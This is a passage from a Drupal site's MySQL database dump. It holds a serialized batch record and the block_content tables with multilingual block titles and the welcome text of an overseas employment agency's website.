f72223b733a31313a22656469742d7375626d6974223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a31313a22656469742d7375626d6974223b7d733a31393a22002a006861735f66696c655f656c656d656e74223b4e3b733a393a22002a0067726f757073223b523a3532333b733a31303a22002a0073746f72616765223b613a303a7b7d733a31303a22002a00627574746f6e73223b613a313a7b693a303b613a32333a7b733a353a222374797065223b733a363a227375626d6974223b733a363a222376616c7565223b723a3737373b733a32353a222365786563757465735f7375626d69745f63616c6c6261636b223b623a313b733a363a2223696e707574223b623a313b733a353a22236e616d65223b733a323a226f70223b733a31303a222369735f627574746f6e223b623a313b733a32343a22236c696d69745f76616c69646174696f6e5f6572726f7273223b623a303b733a383a222370726f63657373223b613a323a7b693a303b613a323a7b693a303b733a33333a2244727570616c5c436f72655c52656e6465725c456c656d656e745c5375626d6974223b693a313b733a31333a2270726f63657373427574746f6e223b7d693a313b613a323a7b693a303b733a33333a2244727570616c5c436f72655c52656e6465725c456c656d656e745c5375626d6974223b693a313b733a31353a2270726f63657373416a6178466f726d223b7d7d733a31313a22237072655f72656e646572223b613a313a7b693a303b613a323a7b693a303b733a33333a2244727570616c5c436f72655c52656e6465725c456c656d656e745c5375626d6974223b693a313b733a31353a2270726552656e646572427574746f6e223b7d7d733a31353a22237468656d655f7772617070657273223b613a313a7b693a303b733a31333a22696e7075745f5f7375626d6974223b7d733a31353a222376616c75655f63616c6c6261636b223b613a323a7b693a303b733a33333a2244727570616c5c436f72655c52656e6465725c456c656d656e745c5375626d6974223b693a313b733a31333a2276616c756543616c6c6261636b223b7d733a31363a222364656661756c74735f6c6f61646564223b623a313b733a353a222374726565223b623a303b733a383a2223706172656e7473223b613a313a7b693a303b733a363a227375626d6974223b7d733a31343a222361727261795f706172656e7473223b613a323a7b693a303b733a373a22616374696f6e73223b693a313b733a363a227375626d6974223b7d733a373a2223776569676874223b693a303b733a31303a222370726f636573736564223b623a303b733a393a22237265717569726564223b623a303b733a31313a222361747472696275746573223b613a313a7b733a32303a22646174612d64727570616c2d73656c6563746f72223b733a31313a22656469742d7375626d6974223b7d733a31343a22237469746c655f646973706c6179223b733a363a226265666f7265223b733a32303a22236465736372697074696f6e5f646973706c6179223b733a353a226166746572223b733a373a22236572726f7273223b4e3b733a333a22236964223b733a31313a22656469742d7375626d6974223b7d7d733a31323a22002a0074656d706f72617279223b613a303a7b7d733a32323a22002a0076616c69646174696f6e5f636f6d706c657465223b623a313b733a393a22002a006572726f7273223b613a303a7b7d733a32363a22002a006c696d69745f76616c69646174696f6e5f6572726f7273223b4e3b733a32303a22002a0076616c69646174655f68616e646c657273223b613a303a7b7d733a31383a22002a007375626d69745f68616e646c657273223b613a303a7b7d7d733a31313a2270726f6772657373697665223b623a313b733a31313a2263757272656e745f736574223b693a303b733a333a2275726c223b4f3a31353a2244727570616c5c436f72655c55726c223a31313a7b733a31353a22002a0075726c417373656d626c6572223b4e3b733a31363a22002a006163636573734d616e61676572223b4e3b733a31323a22002a00726f7574654e616d65223b733a32323a2273797374656d2e62617463685f706167652e68746d6c223b733a31383a22002a00726f757465506172616d6574657273223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a353a227175657279223b613a323a7b733a323a226964223b733a323a223132223b733a323a226f70223b733a373a22646f5f6e6f6a73223b7d7d733a31313a22002a0065787465726e616c223b623a303b733a31313a22002a00756e726f75746564223b623a303b733a363a22002a00757269223b4e3b733a31353a22002a00696e7465726e616c50617468223b4e3b733a31343a22002a005f73657276696365496473223b613a313a7b733a31323a2275726c47656e657261746f72223b733a31333a2275726c5f67656e657261746f72223b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d7d733a31303a22736f757263655f75726c223b4f3a31353a2244727570616c5c436f72655c55726c223a31323a7b733a31353a22002a0075726c47656e657261746f72223b4e3b733a31353a22002a0075726c417373656d626c6572223b4e3b733a31363a22002a006163636573734d616e61676572223b4e3b733a31323a22002a00726f7574654e616d65223b733a32303a227570646174652e7265706f72745f757064617465223b733a31383a22002a00726f757465506172616d6574657273223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a353a227175657279223b613a303a7b7d7d733a31313a22002a0065787465726e616c223b623a303b733a31313a22002a00756e726f75746564223b623a303b733a363a22002a00757269223b4e3b733a31353a22002a00696e7465726e616c50617468223b4e3b733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d7d733a31343a2262617463685f7265646972656374223b4e3b733a353a227468656d65223b733a353a22636c61726f223b733a31373a2272656469726563745f63616c6c6261636b223b4e3b733a323a226964223b733a323a223132223b733a31333a226572726f725f6d657373616765223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a35383a22506c6561736520636f6e74696e756520746f203c6120687265663d223a6572726f725f75726c223e746865206572726f7220706167653c2f613e223b733a31323a22002a00617267756d656e7473223b613a313a7b733a31303a223a6572726f725f75726c223b733a32373a222f656e2f62617463683f69643d3132266f703d66696e6973686564223b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a2272756e6e696e67223b623a313b7d);

-- --------------------------------------------------------

--
-- Table structure for table `block_content`
--

CREATE TABLE `block_content` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED DEFAULT NULL,
  `type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `uuid` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The base table for block_content entities.';

--
-- Dumping data for table `block_content`
--

INSERT INTO `block_content` (`id`, `revision_id`, `type`, `uuid`, `langcode`) VALUES
(1, 1, 'basic', 'ecd641c3-82f1-4969-81b0-1afef47de1c1', 'en'),
(2, 2, 'basic', '66bfe200-674a-4910-8c22-999ca94511a9', 'en'),
(3, 3, 'basic', '8bee8423-232e-4e4b-836c-26aaeed5b7c1', 'en'),
(4, 4, 'basic', 'a2e20829-3160-4f12-978d-913fbebfda0a', 'en'),
(5, 5, 'basic', 'f495c625-c84d-4503-ae23-0a83fc5a136c', 'en'),
(6, 6, 'basic', 'fa1f556f-058e-4375-a3a4-0220a5c41e6c', 'en'),
(7, 7, 'basic', '9b4bc5e3-7f54-4a7e-a45a-53b349632499', 'en'),
(8, 8, 'basic', 'd0c80218-6877-464a-a2d8-c55f61552d26', 'en'),
(9, 9, 'basic', 'f4d23293-b303-40c4-ae50-de4aac6a1b29', 'en'),
(10, 10, 'basic', '40abcf7e-925b-4ea8-b7b0-2707ccb8d6f0', 'en'),
(11, 11, 'basic', '6a44ceb9-3a2c-453b-a682-94dab996f769', 'en'),
(12, 12, 'basic', 'b30174ac-2c4d-4af0-835a-c63c77196f05', 'en'),
(13, 13, 'basic', '138c3a35-bb2d-41c9-90f2-c410c1e49e2a', 'en'),
(14, 14, 'basic', '2c67ae30-660b-4e7d-b50b-f9cfe620af21', 'en'),
(15, 15, 'basic', '95b4f279-da45-41e6-9578-173c34f22671', 'en'),
(16, 16, 'basic', 'a9b8040a-f03f-42aa-b5e8-a63edf85a8ad', 'en'),
(17, 17, 'basic', '8f2f8465-f196-443a-a8e7-b7899cc51520', 'en'),
(18, 18, 'basic', '07637395-5389-42c8-a25c-5469747187fd', 'en'),
(19, 19, 'basic', 'dd1283e1-b3e5-4bef-84de-09c1d89284af', 'en'),
(20, 20, 'basic', '45b08ad0-a217-43c9-a35d-c5e9f4dcb0ab', 'en'),
(21, 21, 'basic', '990a3912-4f65-483a-8388-e2dab99fa1fc', 'en'),
(22, 22, 'basic', '57ff8dde-f140-4cea-93df-071ddbb43919', 'ja'),
(23, 23, 'basic', '5c8eb5bb-7977-4f29-aff6-a9e573341065', 'en'),
(24, 24, 'basic', '8adcc36c-600b-4a64-b457-dbf2ea8a34f9', 'ja');

-- --------------------------------------------------------

--
-- Table structure for table `block_content_field_data`
--

CREATE TABLE `block_content_field_data` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `type` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL COMMENT 'The ID of the target entity.',
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `info` varchar(255) DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `reusable` tinyint DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL,
  `content_translation_uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `content_translation_created` int DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The data table for block_content entities.';

--
-- Dumping data for table `block_content_field_data`
--

INSERT INTO `block_content_field_data` (`id`, `revision_id`, `type`, `langcode`, `status`, `info`, `changed`, `reusable`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`, `content_translation_uid`, `content_translation_created`) VALUES
(1, 1, 'basic', 'en', 1, 'Welcome', 1689413735, 1, 1, 1, 'und', 0, 0, 1689413735),
(1, 1, 'basic', 'ja', 1, 'Welcome', 1690340803, 1, 0, 1, 'en', 0, 2, 1688386007),
(1, 1, 'basic', 'ko', 1, 'Welcome', 1690786646, 1, 0, 1, 'en', 0, 2, 1688386017),
(2, 2, 'basic', 'en', 1, 'More announcement', 1687405360, 1, 1, 1, 'und', 0, NULL, NULL),
(2, 2, 'basic', 'ja', 1, 'More announcement', 1690341059, 1, 0, 1, 'en', 0, 1, 1690341059),
(2, 2, 'basic', 'ko', 1, 'More announcement', 1690340649, 1, 0, 1, 'en', 0, 1, 1690340649),
(3, 3, 'basic', 'en', 1, 'More activity', 1687405371, 1, 1, 1, 'und', 0, NULL, NULL),
(3, 3, 'basic', 'ja', 1, 'More activity', 1690341112, 1, 0, 1, 'en', 0, 1, 1690341112),
(3, 3, 'basic', 'ko', 1, 'More activity', 1690340717, 1, 0, 1, 'en', 0, 1, 1690340717),
(4, 4, 'basic', 'en', 1, 'Contact Us-block', 1692933379, 1, 1, 1, 'und', 0, 0, 1689664986),
(4, 4, 'basic', 'ja', 1, 'Contact Us-block', 1692933410, 1, 0, 1, 'en', 0, 2, 1688385857),
(4, 4, 'basic', 'ko', 1, 'Contact Us-block', 1692933433, 1, 0, 1, 'en', 0, 2, 1688385867),
(5, 5, 'basic', 'en', 1, 'Facebook', 1687405387, 1, 1, 1, 'und', 0, NULL, NULL),
(5, 5, 'basic', 'ja', 1, 'Facebook', 1689671210, 1, 0, 1, 'en', 0, 1, 1689671210),
(5, 5, 'basic', 'ko', 1, 'Facebook', 1689671241, 1, 0, 1, 'en', 0, 1, 1689671241),
(6, 6, 'basic', 'en', 1, 'Copyright', 1687405721, 1, 1, 1, 'und', 0, NULL, NULL),
(7, 7, 'basic', 'en', 1, 'Announcement title', 1687314203, 1, 1, 1, 'und', 0, NULL, NULL),
(7, 7, 'basic', 'ja', 1, 'Announcement title', 1692241113, 1, 0, 1, 'en', 0, 2, 1688385958),
(7, 7, 'basic', 'ko', 1, 'Announcement title', 1692241151, 1, 0, 1, 'en', 0, 2, 1688385967),
(8, 8, 'basic', 'en', 1, 'About Us title', 1687348075, 1, 1, 1, 'und', 0, NULL, NULL),
(8, 8, 'basic', 'ja', 1, 'About Us title', 1690089790, 1, 0, 1, 'en', 0, 2, 1688385934),
(8, 8, 'basic', 'ko', 1, 'About Us title', 1690256838, 1, 0, 1, 'en', 0, 2, 1688385942),
(9, 9, 'basic', 'en', 1, 'Contact Us title', 1687348135, 1, 1, 1, 'und', 0, NULL, NULL),
(9, 9, 'basic', 'ja', 1, 'Contact Us title', 1692243598, 1, 0, 1, 'en', 0, 2, 1688385897),
(9, 9, 'basic', 'ko', 1, 'Contact Us title', 1690257681, 1, 0, 1, 'en', 0, 2, 1688385907),
(10, 10, 'basic', 'en', 1, 'Activities title', 1687348212, 1, 1, 1, 'und', 0, NULL, NULL),
(10, 10, 'basic', 'ja', 1, 'Activities title', 1692241276, 1, 0, 1, 'en', 0, 2, 1688385983),
(10, 10, 'basic', 'ko', 1, 'Activities title', 1692241310, 1, 0, 1, 'en', 0, 2, 1688385992),
(11, 11, 'basic', 'en', 1, 'Company Profile title', 1688386253, 1, 1, 1, 'und', 0, 2, 1688386060),
(11, 11, 'basic', 'ja', 1, 'Company Profile title', 1689919231, 1, 0, 1, 'en', 0, 2, 1688386209),
(11, 11, 'basic', 'ko', 1, 'Company Profile title', 1689919193, 1, 0, 1, 'en', 0, 2, 1688386218),
(12, 12, 'basic', 'en', 1, 'Our Services title', 1688386361, 1, 1, 1, 'und', 0, 2, 1688386290),
(12, 12, 'basic', 'ja', 1, 'Our Services title', 1690085043, 1, 0, 1, 'en', 0, 2, 1688386315),
(12, 12, 'basic', 'ko', 1, 'Our Services title', 1690256878, 1, 0, 1, 'en', 0, 2, 1688386350),
(13, 13, 'basic', 'en', 1, 'Vision & Mission title', 1689649570, 1, 1, 1, 'und', 0, 2, 1688386478),
(13, 13, 'basic', 'ja', 1, 'Mission & Vision title', 1690085007, 1, 0, 1, 'en', 0, 2, 1688386499),
(13, 13, 'basic', 'ko', 1, 'Mission & Vision title', 1690257772, 1, 0, 1, 'en', 0, 2, 1688386516),
(14, 14, 'basic', 'en', 1, 'Future Goal title', 1688386668, 1, 1, 1, 'und', 0, 2, 1688386619),
(14, 14, 'basic', 'ja', 1, 'Future Goal title', 1690084655, 1, 0, 1, 'en', 0, 2, 1688386644),
(14, 14, 'basic', 'ko', 1, 'Future Goal title', 1690087659, 1, 0, 1, 'en', 0, 2, 1688386658),
(15, 15, 'basic', 'en', 1, 'Company History title', 1688386773, 1, 1, 1, 'und', 0, 2, 1688386741),
(15, 15, 'basic', 'ja', 1, 'Company History title', 1690084605, 1, 0, 1, 'en', 0, 2, 1688386764),
(15, 15, 'basic', 'ko', 1, 'Company History title', 1688386782, 1, 0, 1, 'en', 0, 2, 1688386782),
(16, 16, 'basic', 'en', 1, 'Company Profiles', 1689924651, 1, 1, 1, 'und', 0, 1, 1689662069),
(16, 16, 'basic', 'ja', 1, '会社情報tt', 1690342455, 1, 0, 1, 'en', 0, 1, 1689662285),
(16, 16, 'basic', 'ko', 1, '회사 설립', 1690786671, 1, 0, 1, 'en', 0, 1, 1689662318),
(17, 17, 'basic', 'en', 1, 'Our Services', 1689668528, 1, 1, 1, 'und', 0, 1, 1689662536),
(17, 17, 'basic', 'ja', 1, 'Our Services', 1690342522, 1, 0, 1, 'en', 0, 1, 1689662710),
(17, 17, 'basic', 'ko', 1, '회사 서비스', 1690786771, 1, 0, 1, 'en', 0, 1, 1689662735),
(18, 18, 'basic', 'en', 1, 'Vision & Mission', 1689668591, 1, 1, 1, 'und', 0, 1, 1689662821),
(18, 18, 'basic', 'ja', 1, 'Vision & Mission', 1690340954, 1, 0, 1, 'en', 0, 1, 1689664337),
(18, 18, 'basic', 'ko', 1, '우리의 비젼 & 우리의 미션', 1690786746, 1, 0, 1, 'en', 0, 1, 1689664349),
(19, 19, 'basic', 'en', 1, 'Future Goal', 1689668654, 1, 1, 1, 'und', 0, 1, 1689664402),
(19, 19, 'basic', 'ja', 1, '会社の目標', 1690340930, 1, 0, 1, 'en', 0, 1, 1689664619),
(19, 19, 'basic', 'ko', 1, '회사의 미래 비전', 1690786722, 1, 0, 1, 'en', 0, 1, 1689664651),
(20, 20, 'basic', 'en', 1, 'Company History', 1689666654, 1, 1, 1, 'und', 0, 1, 1689664768),
(20, 20, 'basic', 'ja', 1, '会社沿革', 1690340901, 1, 0, 1, 'en', 0, 1, 1689664807),
(20, 20, 'basic', 'ko', 1, '회사 연혁', 1690786697, 1, 0, 1, 'en', 0, 1, 1689664840),
(21, 21, 'basic', 'en', 1, 'Contact Us', 1689669350, 1, 1, 1, 'und', 0, 1, 1689664998),
(21, 21, 'basic', 'ja', 1, 'Contact Us', 1690342362, 1, 0, 1, 'en', 0, 1, 1689665054),
(21, 21, 'basic', 'ko', 1, '연락처', 1690786822, 1, 0, 1, 'en', 0, 1, 1689665110),
(22, 22, 'basic', 'ja', 1, 'More Language Center', 1787790159, 1, 1, 1, 'und', 0, 2, 1787750384),
(23, 23, 'basic', 'en', 1, 'More Language Center', 1787789576, 1, 1, 1, 'und', 0, 2, 1787789576),
(24, 24, 'basic', 'en', 1, 'Language Center title', 1787789697, 1, 0, 1, 'ja', 0, 2, 1787789697),
(24, 24, 'basic', 'ja', 1, 'Language Center title', 1787922887, 1, 1, 1, 'und', 0, 2, 1787789626),
(24, 24, 'basic', 'ko', 1, 'Language Center title', 1787922941, 1, 0, 1, 'ja', 0, 2, 1787922941);

-- --------------------------------------------------------

--
-- Table structure for table `block_content_field_revision`
--

CREATE TABLE `block_content_field_revision` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `status` tinyint NOT NULL,
  `info` varchar(255) DEFAULT NULL,
  `changed` int DEFAULT NULL,
  `default_langcode` tinyint NOT NULL,
  `revision_translation_affected` tinyint DEFAULT NULL,
  `content_translation_source` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL,
  `content_translation_outdated` tinyint DEFAULT NULL,
  `content_translation_uid` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `content_translation_created` int DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision data table for block_content entities.';

--
-- Dumping data for table `block_content_field_revision`
--

INSERT INTO `block_content_field_revision` (`id`, `revision_id`, `langcode`, `status`, `info`, `changed`, `default_langcode`, `revision_translation_affected`, `content_translation_source`, `content_translation_outdated`, `content_translation_uid`, `content_translation_created`) VALUES
(1, 1, 'en', 1, 'Welcome', 1689413735, 1, 1, 'und', 0, 0, 1689413735),
(1, 1, 'ja', 1, 'Welcome', 1690340803, 0, 1, 'en', 0, 2, 1688386007),
(1, 1, 'ko', 1, 'Welcome', 1690786646, 0, 1, 'en', 0, 2, 1688386017),
(2, 2, 'en', 1, 'More announcement', 1687405360, 1, 1, 'und', 0, NULL, NULL),
(2, 2, 'ja', 1, 'More announcement', 1690341059, 0, 1, 'en', 0, 1, 1690341059),
(2, 2, 'ko', 1, 'More announcement', 1690340649, 0, 1, 'en', 0, 1, 1690340649),
(3, 3, 'en', 1, 'More activity', 1687405371, 1, 1, 'und', 0, NULL, NULL),
(3, 3, 'ja', 1, 'More activity', 1690341112, 0, 1, 'en', 0, 1, 1690341112),
(3, 3, 'ko', 1, 'More activity', 1690340717, 0, 1, 'en', 0, 1, 1690340717),
(4, 4, 'en', 1, 'Contact Us-block', 1692933379, 1, 1, 'und', 0, 0, 1689664986),
(4, 4, 'ja', 1, 'Contact Us-block', 1692933410, 0, 1, 'en', 0, 2, 1688385857),
(4, 4, 'ko', 1, 'Contact Us-block', 1692933433, 0, 1, 'en', 0, 2, 1688385867),
(5, 5, 'en', 1, 'Facebook', 1687405387, 1, 1, 'und', 0, NULL, NULL),
(5, 5, 'ja', 1, 'Facebook', 1689671210, 0, 1, 'en', 0, 1, 1689671210),
(5, 5, 'ko', 1, 'Facebook', 1689671241, 0, 1, 'en', 0, 1, 1689671241),
(6, 6, 'en', 1, 'Copyright', 1687405721, 1, 1, 'und', 0, NULL, NULL),
(7, 7, 'en', 1, 'Announcement title', 1687314203, 1, 1, 'und', 0, NULL, NULL),
(7, 7, 'ja', 1, 'Announcement title', 1692241113, 0, 1, 'en', 0, 2, 1688385958),
(7, 7, 'ko', 1, 'Announcement title', 1692241151, 0, 1, 'en', 0, 2, 1688385967),
(8, 8, 'en', 1, 'About Us title', 1687348075, 1, 1, 'und', 0, NULL, NULL),
(8, 8, 'ja', 1, 'About Us title', 1690089790, 0, 1, 'en', 0, 2, 1688385934),
(8, 8, 'ko', 1, 'About Us title', 1690256838, 0, 1, 'en', 0, 2, 1688385942),
(9, 9, 'en', 1, 'Contact Us title', 1687348135, 1, 1, 'und', 0, NULL, NULL),
(9, 9, 'ja', 1, 'Contact Us title', 1692243598, 0, 1, 'en', 0, 2, 1688385897),
(9, 9, 'ko', 1, 'Contact Us title', 1690257681, 0, 1, 'en', 0, 2, 1688385907),
(10, 10, 'en', 1, 'Activities title', 1687348212, 1, 1, 'und', 0, NULL, NULL),
(10, 10, 'ja', 1, 'Activities title', 1692241276, 0, 1, 'en', 0, 2, 1688385983),
(10, 10, 'ko', 1, 'Activities title', 1692241310, 0, 1, 'en', 0, 2, 1688385992),
(11, 11, 'en', 1, 'Company Profile title', 1688386253, 1, 1, 'und', 0, 2, 1688386060),
(11, 11, 'ja', 1, 'Company Profile title', 1689919231, 0, 1, 'en', 0, 2, 1688386209),
(11, 11, 'ko', 1, 'Company Profile title', 1689919193, 0, 1, 'en', 0, 2, 1688386218),
(12, 12, 'en', 1, 'Our Services title', 1688386361, 1, 1, 'und', 0, 2, 1688386290),
(12, 12, 'ja', 1, 'Our Services title', 1690085043, 0, 1, 'en', 0, 2, 1688386315),
(12, 12, 'ko', 1, 'Our Services title', 1690256878, 0, 1, 'en', 0, 2, 1688386350),
(13, 13, 'en', 1, 'Vision & Mission title', 1689649570, 1, 1, 'und', 0, 2, 1688386478),
(13, 13, 'ja', 1, 'Mission & Vision title', 1690085007, 0, 1, 'en', 0, 2, 1688386499),
(13, 13, 'ko', 1, 'Mission & Vision title', 1690257772, 0, 1, 'en', 0, 2, 1688386516),
(14, 14, 'en', 1, 'Future Goal title', 1688386668, 1, 1, 'und', 0, 2, 1688386619),
(14, 14, 'ja', 1, 'Future Goal title', 1690084655, 0, 1, 'en', 0, 2, 1688386644),
(14, 14, 'ko', 1, 'Future Goal title', 1690087659, 0, 1, 'en', 0, 2, 1688386658),
(15, 15, 'en', 1, 'Company History title', 1688386773, 1, 1, 'und', 0, 2, 1688386741),
(15, 15, 'ja', 1, 'Company History title', 1690084605, 0, 1, 'en', 0, 2, 1688386764),
(15, 15, 'ko', 1, 'Company History title', 1688386782, 0, 1, 'en', 0, 2, 1688386782),
(16, 16, 'en', 1, 'Company Profiles', 1689924651, 1, 1, 'und', 0, 1, 1689662069),
(16, 16, 'ja', 1, '会社情報tt', 1690342455, 0, 1, 'en', 0, 1, 1689662285),
(16, 16, 'ko', 1, '회사 설립', 1690786671, 0, 1, 'en', 0, 1, 1689662318),
(17, 17, 'en', 1, 'Our Services', 1689668528, 1, 1, 'und', 0, 1, 1689662536),
(17, 17, 'ja', 1, 'Our Services', 1690342522, 0, 1, 'en', 0, 1, 1689662710),
(17, 17, 'ko', 1, '회사 서비스', 1690786771, 0, 1, 'en', 0, 1, 1689662735),
(18, 18, 'en', 1, 'Vision & Mission', 1689668591, 1, 1, 'und', 0, 1, 1689662821),
(18, 18, 'ja', 1, 'Vision & Mission', 1690340954, 0, 1, 'en', 0, 1, 1689664337),
(18, 18, 'ko', 1, '우리의 비젼 & 우리의 미션', 1690786746, 0, 1, 'en', 0, 1, 1689664349),
(19, 19, 'en', 1, 'Future Goal', 1689668654, 1, 1, 'und', 0, 1, 1689664402),
(19, 19, 'ja', 1, '会社の目標', 1690340930, 0, 1, 'en', 0, 1, 1689664619),
(19, 19, 'ko', 1, '회사의 미래 비전', 1690786722, 0, 1, 'en', 0, 1, 1689664651),
(20, 20, 'en', 1, 'Company History', 1689666654, 1, 1, 'und', 0, 1, 1689664768),
(20, 20, 'ja', 1, '会社沿革', 1690340901, 0, 1, 'en', 0, 1, 1689664807),
(20, 20, 'ko', 1, '회사 연혁', 1690786697, 0, 1, 'en', 0, 1, 1689664840),
(21, 21, 'en', 1, 'Contact Us', 1689669350, 1, 1, 'und', 0, 1, 1689664998),
(21, 21, 'ja', 1, 'Contact Us', 1690342362, 0, 1, 'en', 0, 1, 1689665054),
(21, 21, 'ko', 1, '연락처', 1690786822, 0, 1, 'en', 0, 1, 1689665110),
(22, 22, 'ja', 1, 'More Language Center', 1787790159, 1, 1, 'und', 0, 2, 1787750384),
(23, 23, 'en', 1, 'More Language Center', 1787789576, 1, 1, 'und', 0, 2, 1787789576),
(24, 24, 'en', 1, 'Language Center title', 1787789697, 0, 1, 'ja', 0, 2, 1787789697),
(24, 24, 'ja', 1, 'Language Center title', 1787922887, 1, 1, 'und', 0, 2, 1787789626),
(24, 24, 'ko', 1, 'Language Center title', 1787922941, 0, 1, 'ja', 0, 2, 1787922941);

-- --------------------------------------------------------

--
-- Table structure for table `block_content_revision`
--

CREATE TABLE `block_content_revision` (
  `id` int UNSIGNED NOT NULL,
  `revision_id` int UNSIGNED NOT NULL,
  `langcode` varchar(12) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL,
  `revision_user` int UNSIGNED DEFAULT NULL COMMENT 'The ID of the target entity.',
  `revision_created` int DEFAULT NULL,
  `revision_log` longtext,
  `revision_default` tinyint DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='The revision table for block_content entities.';

--
-- Dumping data for table `block_content_revision`
--

INSERT INTO `block_content_revision` (`id`, `revision_id`, `langcode`, `revision_user`, `revision_created`, `revision_log`, `revision_default`) VALUES
(1, 1, 'en', NULL, 1687231742, NULL, 1),
(2, 2, 'en', NULL, 1687239467, NULL, 1),
(3, 3, 'en', NULL, 1687239503, NULL, 1),
(4, 4, 'en', NULL, 1687260233, NULL, 1),
(5, 5, 'en', NULL, 1687260380, NULL, 1),
(6, 6, 'en', NULL, 1687260435, NULL, 1),
(7, 7, 'en', NULL, 1687314203, NULL, 1),
(8, 8, 'en', NULL, 1687348075, NULL, 1),
(9, 9, 'en', NULL, 1687348135, NULL, 1),
(10, 10, 'en', NULL, 1687348212, NULL, 1),
(11, 11, 'en', NULL, 1688386060, NULL, 1),
(12, 12, 'en', NULL, 1688386290, NULL, 1),
(13, 13, 'en', NULL, 1688386478, NULL, 1),
(14, 14, 'en', NULL, 1688386619, NULL, 1),
(15, 15, 'en', NULL, 1688386741, NULL, 1),
(16, 16, 'en', NULL, 1689662069, NULL, 1),
(17, 17, 'en', NULL, 1689662536, NULL, 1),
(18, 18, 'en', NULL, 1689662821, NULL, 1),
(19, 19, 'en', NULL, 1689664402, NULL, 1),
(20, 20, 'en', NULL, 1689664768, NULL, 1),
(21, 21, 'en', NULL, 1689664998, NULL, 1),
(22, 22, 'ja', NULL, 1787750384, NULL, 1),
(23, 23, 'en', NULL, 1787789576, NULL, 1),
(24, 24, 'ja', NULL, 1787789626, NULL, 1);

-- --------------------------------------------------------

--
-- Table structure for table `block_content_revision__body`
--

CREATE TABLE `block_content_revision__body` (
  `bundle` varchar(128) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The field instance bundle to which this row belongs, used when deleting a field instance',
  `deleted` tinyint NOT NULL DEFAULT '0' COMMENT 'A boolean indicating whether this data item has been deleted',
  `entity_id` int UNSIGNED NOT NULL COMMENT 'The entity id this data is attached to',
  `revision_id` int UNSIGNED NOT NULL COMMENT 'The entity revision id this data is attached to',
  `langcode` varchar(32) CHARACTER SET ascii COLLATE ascii_general_ci NOT NULL DEFAULT '' COMMENT 'The language code for this data item.',
  `delta` int UNSIGNED NOT NULL COMMENT 'The sequence number for this data item, used for multi-value fields',
  `body_value` longtext NOT NULL,
  `body_summary` longtext,
  `body_format` varchar(255) CHARACTER SET ascii COLLATE ascii_general_ci DEFAULT NULL
) ENGINE=InnoDB DEFAULT CHARSET=utf8mb3 COMMENT='Revision archive storage for block_content field body.';

--
-- Dumping data for table `block_content_revision__body`
--

INSERT INTO `block_content_revision__body` (`bundle`, `deleted`, `entity_id`, `revision_id`, `langcode`, `delta`, `body_value`, `body_summary`, `body_format`) VALUES
('basic', 0, 1, 1, 'en', 0, '<p><img src=\"/sites/default/files/inline-images/new_comet_trading_agency.jpg\" data-align=\"left\" data-entity-uuid=\"2db86a59-6abc-480d-8723-840a63e08233\" data-entity-type=\"file\"></p><h3>Welcome to Our Website \"NEW COMET TRADING AGENCY\"!!!!</h3><p>Thank you for visiting our website, \"NEW COMET TRADING AGENCY\"! We are delighted to have you here. Please feel free to explore our website and learn more about the services and opportunities we offer. If you have any questions or need assistance, don\'t hesitate to reach out to us. We are here to help you on your journey towards achieving your goals.</p><p>We, Overseas Employment Agency are currently introducing various job offers from Korea, Japan, Malaysia etc..&nbsp;</p><p>Come &amp; Join Us !!!&nbsp;</p><div><a href=\"/node/1\">Readmore<img src=\"/sites/default/files/inline-images/arrow_icon.png\" data-entity-uuid=\"00e5c4fc-4102-4824-b517-a24f5d33361f\" data-entity-type=\"file\">&nbsp;</a></div>', '', 'full_html'),
